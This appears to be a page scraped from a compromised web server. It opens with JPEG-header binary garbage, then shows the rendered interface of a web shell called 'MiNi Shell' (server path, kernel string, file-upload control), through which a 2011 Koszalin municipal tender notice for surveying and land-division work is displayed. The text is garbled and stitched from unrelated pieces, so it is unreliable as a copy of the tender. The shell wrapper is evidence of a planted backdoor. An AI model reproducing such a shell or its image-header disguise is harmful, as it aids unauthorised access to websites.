JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110201/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110201/36521-N-2011.html

<p class="kh_header"><b>Koszalin: Wykonanie robót geodezyjnych na potrzeby Gminy Miasto Koszalin</b><br>
<b>Numer ogłoszenia: 36521 - 2011; data zamieszczenia: 01.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Koszalin Wydział Nieruchomości , Rynek  Staromiejski 6-7, 75-007 Koszalin, woj. zachodniopomorskie, tel. 94 3488807, faks 94 3488765.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.koszalin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót geodezyjnych na potrzeby Gminy Miasto Koszalin.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie nr 1
Dokonanie połączenia a następnie podziału nieruchomości zgodnie z koncepcją zagospodarowania i podziału terenu w rejonie  ulic Jana z Kolna 22-30 i Spółdzielczej 1-1a.
I. Etap - Dokonanie połączenia działek ewidencyjnych w obrębie nr 20 nr.: 140 (pow. 0,1297 ha, ul. Jana z Kolna 24A), 138 (pow. 0,1973 ha, Jana z Kolna 24B), 141/3 (pow. 0,0396 ha, ul. Jana z Kolna 22A), 137/1 (pow. 0,0517 ha, ul. Jana z Kolna), 136/4 (pow. 0,1428 ha, ul. Jana z Kolna), 101/13 (0,0377 ha, ul. Spółdzielcza).
II. Etap - podział nieruchomości powstałej w wyniku połączenia wyżej wymienionych działek ewidencyjnych, zgodnie z zgodnie z koncepcją zagospodarowania i podziału terenu w rejonie  ulic Jana z Kolna 22-30 i Spółdzielczej 1-1a. Powstanie 11 działek.
III.	Etap - w przypadku stwierdzenia w czasie wykonywania prac zawartych w etapie II, że granica przebiegająca pomiędzy działkami na 138 a nr 139 przechodzi przez budynek, konieczne będzie wydzielenie kolejnej działki po obrysie budynku położonego przy ulicy Jana z Kolna 26. 
Zadanie nr 2 - Wykonanie aktualizacji użytków gruntowych dla nieruchomości gruntowych położonych w Koszalinie zgodnie z przeznaczeniem w miejscowych planach zagospodarowania przestrzennego wraz z dostarczeniem w 2 egz. wypisów i wyrysów z naniesionymi zmienionymi użytkami nieruchomości z cechami dokumentu upoważniającego do dokonania wpisu w księdze wieczystej. Nieruchomości: obręb 19 działka 272 ul. Rotmistrza Witolda Pileckiego; obręb 20 działki: 193/21, 193/14, 193,34 ul. Rotmistrza Witolda Pileckiego; obręb 21 działki: 128/8, 128/11, 134/1, 135/1, 246 ul. Jaka Stawisińskiego; obręb 19 działka 199/9.
Zadanie nr 3 - Dokonanie podziału działek a następnie połączenia nieruchomości zgodnie z liniami rozgraniczającymi tereny o różnym przeznaczeniu na podstawie miejscowego planu zagospodarowania Strefy Zorganizowanej Działalności Inwestycyjnej oraz planu w rejonie ulic Hipolita Cegielskiego, Mieszka I- go i Strefowej w Koszalinie w dwóch etapach: działka 22/3 obręb 6 powierzchnia 1,8227ha KW 26809; działka 39 obręb 7 powierzchnia 0,3967 KW 35451; działka 33 obręb 7 powierzchnia 0,2575	ha KW 30658; działka 32 obręb 7 powierzchnia 1,2214ha KW 30658; działka 31/4 obręb 7 powierzchnia 2,3075 ha KW 26809; działka 31/6 obręb 7 powierzchnia 1,7803 ha KW 26809; działka 38	obręb 7 powierzchnia 1,2498 ha KW 27346; działka 40 obręb 7 powierzchnia 0,0776 ha KW 26809; działka 6/2 obręb 7 powierzchnia 0,1352 ha KW 26745; działka 5/2 obręb 7 powierzchnia 0,0310 ha KW 26745; działka 1/4 obręb 9 powierzchnia 17,5755 ha KW 69904; działka 1/2 obręb 9 powierzchnia 0,2434 ha KW 95724; działka 1/1 obręb 9 powierzchnia 0,0168 ha KW 95724.  I.	Etap - podział niżej wymienionych działek ewidencyjnych zgodnie z liniami rozgraniczającymi tereny o różnym przeznaczeniu w planie zagospodarowania. Powstaną 34 działki. II.	Etap - Dokonanie połączenia niżej wymienionych działek ewidencyjnych w jedną działkę ewidencyjną. Powstaną 4 działki. Zadanie nr 4 - Dokonanie podziału nieruchomości zgodnie z liniami rozgraniczającymi tereny o różnym przeznaczeniu w miejscowym planie zagospodarowania przestrzennego dla obszaru Rokosowo Południe - Dzierżęcin  w Koszalinie, a następnie połączenie nowopowstałych działek z działkami istniejącymi zgodnie z w/w planem, w dwóch etapach. Działki ewidencyjne położone w obrębie nr 28 oznaczone ewidencyjnie: 269/8 pow. 3,0325 ha KW 41102; 153/1 pow. 0,4070 ha KW 27380; 155/4 pow. 0,0136 ha KW 27380; 154 pow. 0,0635 ha KW 27380; 603/3 pow. 0,3890 ha KW 27380; 409 pow. 0,3069 ha KW 27380; 279 pow. 0,2019 ha KW 27380; 269/10 pow. 0,1233 ha KW 41102; 269/9 pow. 0,1614 ha KW 41102; 603/2 pow. 0,0935 ha KW 27380. I. Etap - Podział wyżej wymienionych działek ewidencyjnych, zgodnie z zgodnie z liniami rozgraniczającymi tereny o różnym przeznaczeniu w miejscowym planie zagospodarowania przestrzennego. Powstanie 20 działek. II. Etap - Dokonanie połączenia działek powstałych w wyniku podziału działek ewidencyjnych. Zadanie nr 5 - Dokonanie podziału nieruchomości zgodnie z liniami rozgraniczającymi tereny o różnym przeznaczeniu w miejscowym planie zagospodarowania przestrzennego Śródmieścia Koszalina oraz koncepcji zagospodarowania i podziału terenu N.AM.72331-11/10 oraz N.AM.72331-13/10. Działki ewidencyjne położone w Koszalinie przy ulicy Stefana Okrzei w obrębie nr 20 nr, nr: 331/4 pow. 0,0329 ha KW 26507;339/4 pow. 0,1435 ha KW 27310; 627/2 pow. 0,0731 ha KW 31563. Podział wyżej wymienionych działek ewidencyjnych zgodnie z liniami rozgraniczającymi tereny o różnym przeznaczeniu w miejscowym planie zagospodarowania przestrzennego oraz koncepcji zagospodarowania i podziału terenu na zapleczu budynków przy ul. Dworcowej 9-11, Okrzei 4, Zwycięstwa 7-9. Powstanie 11 działek. Zadanie nr 6 - Okazanie granic nieruchomości gruntowej będącej przedmiotem postępowania administracyjnego o zwrot wywłaszczonych nieruchomości stanowiącej własność  Gminy Miasto Koszalin oznaczonej ewidencyjnie działką ewidencyjną nr 777 o powierzchni 0,1621 ha oraz działką ewidencyjną nr 776 o powierzchni 0,0169 ha w obrębie ewidencyjnym nr 31, położonej w Koszalinie przy ulicy Zdobywców Wału Pomorskiego, w celu dokładnego określenia przebiegu granicy w szczególności poprzez budowlę wzniesioną na gruncie na granicy z działką ewidencyjną nr 190. Zadanie nr 7
Dokonanie połączenia działek ewidencyjnych nr: 
-	193/16 o powierzchni 0,0020 ha, 
-	193/24 o powierzchni 0,0439 ha,
-	193/29 o powierzchni 0,1780 ha,
-	193/33 o powierzchni 0,0391 ha,
oznaczonych ewidencyjnie w obrębie ewidencyjnym nr 20, położonych w Koszalinie przy ul. Bartosza Głowackiego i Marszałka  Józefa Piłsudskiego, ujawnionych w księdze wieczystej KW Nr KO1K/00027267/8 w Wydziale Ksiąg Wieczystych Sądu Rejonowego w Koszalinie oraz dokonanie aktualizacji użytku gruntowego nowo powstałej działki..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4, 71.35.50.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium w przedmiotowym postępowaniu</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni, iż Wykonawca spełnia warunek udziału w postępowaniu w przypadku, gdy załączy do oferty oświadczenie, że spełnia warunki, o których mowa w art. 22 ust. 1 pkt. 1 ustawy z dnia 29 stycznia 2004 r. Prawo Zamówień Publicznych. Treść oświadczenia określa załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni, iż Wykonawca spełnia warunek udziału w postępowaniu w przypadku, gdy załączy do oferty oświadczenie, że spełnia warunki, o których mowa w art. 22 ust. 1 pkt. 2 ustawy 
z dnia 29 stycznia 2004 r. Prawo Zamówień Publicznych. Treść oświadczenia określa załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni, iż Wykonawca spełnia warunek udziału w postępowaniu w przypadku, gdy załączy do oferty:
a)	wykaz osób, które będą uczestniczyć w wykonaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia, a także zakres wykonywanych przez nie czynności, oraz informacją 
o podstawie do dysponowania tymi osobami. Druk wykazu osób stanowi załącznik nr 5 do SIWZ,
b)	oświadczenie , że osoby o których mowa w Rozdziale IV ust. 1 pkt. 3 lit. a SIWZ posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek takich uprawnień tj. posiadają uprawnienia państwowe do wykonywania prac geodezyjnych  i kartograficznych. Treść oświadczenia określa załącznik nr 5 do SIWZ, 
c)	oświadczenie, że spełnia warunki, o których mowa w art. 22 ust. 1 pkt. 3 ustawy z dnia 29 stycznia 2004 r. Prawo Zamówień Publicznych. Treść oświadczenia określa załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni, iż Wykonawca spełnia warunek udziału w postępowaniu w przypadku, gdy załączy do oferty:
a)	oświadczenie, że nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu. Treść oświadczenia określa zał. nr 4 do SIWZ,
b)	oświadczenie, że spełnia warunki, o których mowa w art. 22 ust. 1 pkt. 4 ustawy z dnia 29 stycznia 2004 r. Prawo Zamówień Publicznych. Treść oświadczenia określa załącznik nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	Oświadczenie Wykonawcy, że spełnia warunki określone w art. 22 ust. 1 ustawy Prawo Zamówień Publicznych, złożone na druku, stanowiącym załącznik nr 2 do SIWZ.
b)	Oświadczenie Wykonawcy o braku podstaw do wykluczenia w okolicznościach, o których mowa w art. 24 ust. 1 ustawy Prawo Zamówień Publicznych, złożone na druku stanowiącym załącznik nr 3 do SIWZ.
c)	Oświadczenie Wykonawcy, że nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu, złożone na druku, stanowiącym załącznik nr 4 do SIWZ.
d)	Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia, a także zakresu wykonywanych prze nie czynności oraz informacją o podstawie do dysponowania tymi osobami, złożony na druku, stanowiącym załącznik nr 5 do SIWZ.
e)	Oświadczenie , że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień tj. posiadają uprawnienia państwowe do wykonywania prac geodezyjnych  i kartograficznych, złożone na druku, stanowiącym załącznik nr 5 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.koszalin.pl-Zamówienia publiczne-Wydział Nieruchomości-2011-Usługi na roboty geodezyjne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nieodpłatnie w Wydziale Nieruchomości, Urzędu Miejskiego w Koszalinie, Rynek Staromiejski 6-7, pokój 230 w godzinach pracy Urzędu (pn. - pt. 7:45-15:45).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.02.2011 godzina 12:00, miejsce: Urząd Miejski w Koszalinie, Rynek Staromiejski 6-7, Wydział Nieruchomości, pokój 230, w terminie do dnia 9 lutego 2011 r. do godziny 12.00..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dokonanie połączenia a następnie podziału nieruchomości zgodnie z koncepcją zagospodarowania i podziału terenu w rejonie  ulic Jana z Kolna 22-30 i Spółdzielczej 1-1a.
I. Etap - Dokonanie połączenia działek ewidencyjnych w obrębie nr 20 nr.: 140 (pow. 0,1297 ha, ul. Jana z Kolna 24A), 138 (pow. 0,1973 ha, Jana z Kolna 24B), 141/3 (pow. 0,0396 ha, ul. Jana z Kolna 22A), 137/1 (pow. 0,0517 ha, ul. Jana z Kolna), 136/4 (pow. 0,1428 ha, ul. Jana z Kolna), 101/13 (0,0377 ha, ul. Spółdzielcza).
II. Etap - podział nieruchomości powstałej w wyniku połączenia wyżej wymienionych działek ewidencyjnych, zgodnie z zgodnie z koncepcją zagospodarowania i podziału terenu w rejonie  ulic Jana z Kolna 22-30 i Spółdzielczej 1-1a. Powstanie 11 działek.
III.	Etap - w przypadku stwierdzenia w czasie wykonywania prac zawartych w etapie II, że granica przebiegająca pomiędzy działkami na 138 a nr 139 przechodzi przez budynek, konieczne będzie wydzielenie kolejnej działki po obrysie budynku położonego przy ulicy Jana z Kolna 26..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4, 71.35.50.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie aktualizacji użytków gruntowych dla nieruchomości gruntowych położonych w Koszalinie zgodnie z przeznaczeniem w miejscowych planach zagospodarowania przestrzennego wraz z dostarczeniem w 2 egz. wypisów i wyrysów z naniesionymi zmienionymi użytkami nieruchomości z cechami dokumentu upoważniającego do dokonania wpisu w księdze wieczystej. Nieruchomości: obręb 19 działka 272 ul. Rotmistrza Witolda Pileckiego; obręb 20 działki: 193/21, 193/14, 193,34 ul. Rotmistrza Witolda Pileckiego; obręb 21 działki: 128/8, 128/11, 134/1, 135/1, 246 ul. Jaka Stawisińskiego; obręb 19 działka 199/9.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dokonanie podziału działek a następnie połączenia nieruchomości zgodnie z liniami rozgraniczającymi tereny o różnym przeznaczeniu na podstawie miejscowego planu zagospodarowania Strefy Zorganizowanej Działalności Inwestycyjnej oraz planu w rejonie ulic Hipolita Cegielskiego, Mieszka I- go i Strefowej w Koszalinie w dwóch etapach: działka 22/3 obręb 6 powierzchnia 1,8227ha KW 26809; działka 39 obręb 7 powierzchnia 0,3967 KW 35451; działka 33 obręb 7 powierzchnia 0,2575	ha KW 30658; działka 32 obręb 7 powierzchnia 1,2214ha KW 30658; działka 31/4 obręb 7 powierzchnia 2,3075 ha KW 26809; działka 31/6 obręb 7 powierzchnia 1,7803 ha KW 26809; działka 38	obręb 7 powierzchnia 1,2498 ha KW 27346; działka 40 obręb 7 powierzchnia 0,0776 ha KW 26809; działka 6/2 obręb 7 powierzchnia 0,1352 ha KW 26745; działka 5/2 obręb 7 powierzchnia 0,0310 ha KW 26745; działka 1/4 obręb 9 powierzchnia 17,5755 ha KW 69904; działka 1/2 obręb 9 powierzchnia 0,2434 ha KW 95724; działka 1/1 obręb 9 powierzchnia 0,0168 ha KW 95724.  I.	Etap - podział niżej wymienionych działek ewidencyjnych zgodnie z liniami rozgraniczającymi tereny o różnym przeznaczeniu w planie zagospodarowania. Powstaną 34 działki. II.	Etap - Dokonanie połączenia niżej wymienionych działek ewidencyjnych w jedną działkę ewidencyjną. Powstaną 4 działki..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4, 71.35.50.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 8.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dokonanie podziału nieruchomości zgodnie z liniami rozgraniczającymi tereny o różnym przeznaczeniu w miejscowym planie zagospodarowania przestrzennego dla obszaru Rokosowo Południe - Dzierżęcin  w Koszalinie, a następnie połączenie nowopowstałych działek z działkami istniejącymi zgodnie z w/w planem, w dwóch etapach. Działki ewidencyjne położone w obrębie nr 28 oznaczone ewidencyjnie: 269/8 pow. 3,0325 ha KW 41102; 153/1 pow. 0,4070 ha KW 27380; 155/4 pow. 0,0136 ha KW 27380; 154 pow. 0,0635 ha KW 27380; 603/3 pow. 0,3890 ha KW 27380; 409 pow. 0,3069 ha KW 27380; 279 pow. 0,2019 ha KW 27380; 269/10 pow. 0,1233 ha KW 41102; 269/9 pow. 0,1614 ha KW 41102; 603/2 pow. 0,0935 ha KW 27380. I. Etap - Podział wyżej wymienionych działek ewidencyjnych, zgodnie z zgodnie z liniami rozgraniczającymi tereny o różnym przeznaczeniu w miejscowym planie zagospodarowania przestrzennego. Powstanie 20 działek. II. Etap - Dokonanie połączenia działek powstałych w wyniku podziału działek ewidencyjnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4, 71.35.50.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 8.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie nr 5.</p>
